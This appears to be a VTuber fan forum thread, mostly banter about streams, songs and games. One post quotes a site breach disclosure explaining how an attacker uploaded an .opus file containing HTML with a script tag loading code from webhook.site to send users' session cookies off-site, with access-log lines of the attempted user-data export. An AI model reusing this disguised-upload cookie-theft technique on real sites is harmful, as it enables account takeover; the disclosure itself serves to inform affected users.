"The first thing La+ Darknesss does when she gets up in the morning? Regretting the life she has lived"Sakamata Chloe

General Vtuber Discussion (V1)

Status
Not open for further replies.

Just pretending

The Great Bald Rrat
Early Adopter
Joined:  Sep 10, 2022
Vesper is playing Spore right now and his creature looks like something taken out of Small Soldiers (the '98 movie), with a bit of a Scooby Doo monster mixed in. A literal broken toy, is Vesper actually that Sid kid from Toy Story?

By the way, the best original song in hololive is obviously Towa's Palette, fite me.
 
Last edited:

Grass4Cats

Cats chew me
Joined:  Sep 12, 2022
Something about moon waist while she joke dancing.


Why Shallys song got teased? We could have witnessed the ID version of dem hips.
 

AyoTempus

DoctorGladiatorAssassinHeroLobsterTempuraEater
Early Adopter
Joined:  Sep 17, 2022
Even despite his apparent attempt to look into optimal creature feature, very simple gameplay mechanics elude grandpire in the most difficult children's video game ever developed: Spore.
Vesper on FTL: Easiest space battles of my life.

Vesper on Zomboid: Easiest apocalypse of my life.

Vesper on Dicey Dungeons: Easiest dice of my life.

Vesper on Raft: Easiest fish of my life.

Vesper on Minecraft: Easiest shaft of my life.

Vesper on Spore: Impossible.

Why is Spore collectively the hardest video game ever played by Holo Tempus?
 

agility_

We have some serious streams to discuss 🔨
Early Adopter
Joined:  Sep 14, 2022
Thanks for the heads up on the status of the homeland. Just to be sure I scrubbed every password, email and IP mask I've been using for the last weeks or so.
 

lakyus

A well-fed spider will bring you much happiness
Early Adopter
Joined:  Sep 16, 2022

Todd's Strongest Howard

Do not trust the sticker farmer.
Early Adopter
Joined:  Sep 13, 2022
Why is Spore collectively the hardest video game ever played by Holo Tempus?

I couldn't for the life of me begin to explain. Everything in the game is straight forward and handed up easily with no complicated mechanics. Somehow no one understands and struggles immensely. It's baffling, but at least Vesper is picking up quicker than others, even if he spent like 10 minutes sperging about speed.

EDIT: Altussy begins, HoloNiji arc inbound.
 

Fucking YTs

I just want to annoy people in peace.
Early Adopter
Joined:  Sep 11, 2022
Latest from Jersh on the situation:
Removing my link to the telegram post and just linking to @Reticule post here.
 

moonlight

Active member
Joined:  Sep 9, 2022
For what it's worth, my poa.st Matrix (that's the chat thing) account was deactivated. No clue why, maybe they didn't like my burner address or something like that. Normal poa.st still works. Don't think this is related to the data breach in any way.
 

Tyrvalla

Well-known member
Early Adopter
Joined:  Sep 16, 2022


How did I miss this, did Laplus contracted Herpes?
 

Scoots

The Pontiff of PonWolf
Early Adopter
Joined:  Sep 10, 2022
I was actually wishing with low expectation but holyshit, I'm so happy oga gets to appear on risu's showcase
This is probably my fav showcase out of all three, also them being able to immortalize the piggy bank scene in 3d finally

EDIT: It's kind of impressive to see her go from ayunda to risu as easy as flipping a switch, she's definitely one of the talented singer in ID
Honestly I'd say shes one of the most talented in Vtubing
Doubleposting really bad. But my previous post is too on a different topic to update it.
And I have to do this doublepost to share Kiara's new mv. Song and video really good as my opinion

Ok clearly I have no idea what double posting is I was always taught it was posting directly after your own post can someone clarify?
This template is gonna go places
Vesper is live now creating the optimal "Regispore Altare."



Edit:
View attachment 680
Edit:
"It has to be the simperton"
View attachment 682
View attachment 683
Edit:
He also gave it arms (for stats) hidden in the back because he wanted to preserve the look. Chat: "the arms are only used for wiping"
View attachment 686
Edit:
View attachment 687

Privated whats the yab?
Vesper is playing Spore right now and his creature looks like something taken out of Small Soldiers (the '98 movie), with a bit of a Scooby Doo monster mixed in. A literal broken toy, is Vesper actually that Sid kid from Toy Story?
I love that movie shit was brutal for a kids movie
"I am archer leader of the gorgonites"
 

Fucking YTs

I just want to annoy people in peace.
Early Adopter
Joined:  Sep 11, 2022

Gura: How do you say "Why are you running in Japanese?"
IRyS: "Whi ar yu running."
Idk why, but that cracks me up.
 
Last edited:

Piarro

Well-known member
Early Adopter
Joined:  Sep 11, 2022

Gura doing a zatsu later tonight at 8PM eastern
 

Nenélove

I am coming for you
Early Adopter
Nene's Pet Latinx
Latinx/Latine
Joined:  Sep 16, 2022

Gura doing a zatsu later tonight at 8PM eastern

Get ready for endless semi-suggestive and risque jokes about being naked in the video with the chat totally """JOKING""" about it.
 

Aka Split

Well-known member
IRyS's husband
Early Adopter
Joined:  Sep 11, 2022

Netscaper

Well-known member
Early Adopter
Joined:  Sep 13, 2022
Kiwawa singing a varied assortment of songs.



Good song. Better that the last one at least.

Pomu playing Ground Zeroes.



"Pomu starts playing love deterrence".
I'm out. Good job Kojima. If your intent was to leave an emotional Phantom Pain to the players, you certainly succeeded in my case.
 
Last edited:

paul

Well-known member
Early Adopter
Joined:  Sep 13, 2022
This Thursday Tamaki celebrates his 4th anniversary in 3D. Guests are Yumeoi Kakeru, Kanda Shoichi, Belmond Banderas and for the first time in ages Aqua and Kagura Mea. Oliver Evans and Roberu will send videos messages. I remember a lot of questionalbe MeAqua clips from 2020 but they stopped interacting in public until their sudden Naisho No Hanashi collab cover a few months ago. I'm really looking forward to this.

 

Scoots

The Pontiff of PonWolf
Early Adopter
Joined:  Sep 10, 2022
Vtuber Cy Yu aka Kaggyfilms aka Alejandro Saab landed the role as Cyno for Genshin Impact
This excites me cause I was highly anticipating Cyno and I'm a big fan of Kaggy's content and Voice Acting going back to his Dragonball days

Edit: Oh sweet my Twitter embed is in dark mode for me cause I use Twitter dark mode this looks so much better with the forum
Edit 2:
Screenshot_20220918-135542.png
 

thhrang

Punished Autism Extraordinaire
Early Adopter
Ward Security
♥Realticule's Husbando♥
Joined:  Sep 13, 2022
New Jersh statement on kiwifarms.net.
1663534396625.png1663534387076.png1663534499931.png

Site Breach​

User Impact Statement​

The forum was hacked. You should assume the following.
  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.

You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.

Prognosis​

The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation​

Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.

The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.

The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
You can find relevant scripts below.
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
<jcmoon@pm.me>

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.
 

Fucking YTs

I just want to annoy people in peace.
Early Adopter
Joined:  Sep 11, 2022

Aliepheese

I like to watch.
Early Adopter
Joined:  Sep 14, 2022

Not Kronii playing games for her friend Yuria Birthday celebration.
 
Status
Not open for further replies.
Top Bottom